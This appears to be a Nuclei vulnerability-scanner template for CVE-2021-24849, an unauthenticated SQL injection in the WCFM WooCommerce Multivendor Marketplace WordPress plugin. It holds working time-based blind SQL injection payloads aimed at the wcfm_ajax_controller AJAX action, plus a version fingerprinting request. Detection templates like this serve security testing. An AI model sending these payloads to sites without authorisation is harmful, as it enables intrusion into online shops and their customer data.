45 lines
1.5 KiB
YAML
45 lines
1.5 KiB
YAML
|
id: CVE-2021-24849
|
||
|
|
||
|
info:
|
||
|
name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
|
||
|
author: ritikchaddha
|
||
|
severity: critical
|
||
|
description: |
|
||
|
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
|
||
|
remediation: Fixed in 3.4.12
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
verified: true
|
||
|
tags: cve,cve2021,wp,wp-plugin,wordpress,wcfm,sqli
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
- |
|
||
|
@timeout: 20s
|
||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
{{post_data}}
|
||
|
|
||
|
payloads:
|
||
|
post_data:
|
||
|
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
|
||
|
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
|
||
|
|
||
|
stop-at-first-match: true
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'duration_2>=5'
|
||
|
- 'status_code == 200'
|
||
|
- 'contains(body_1, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")'
|
||
|
condition: and
|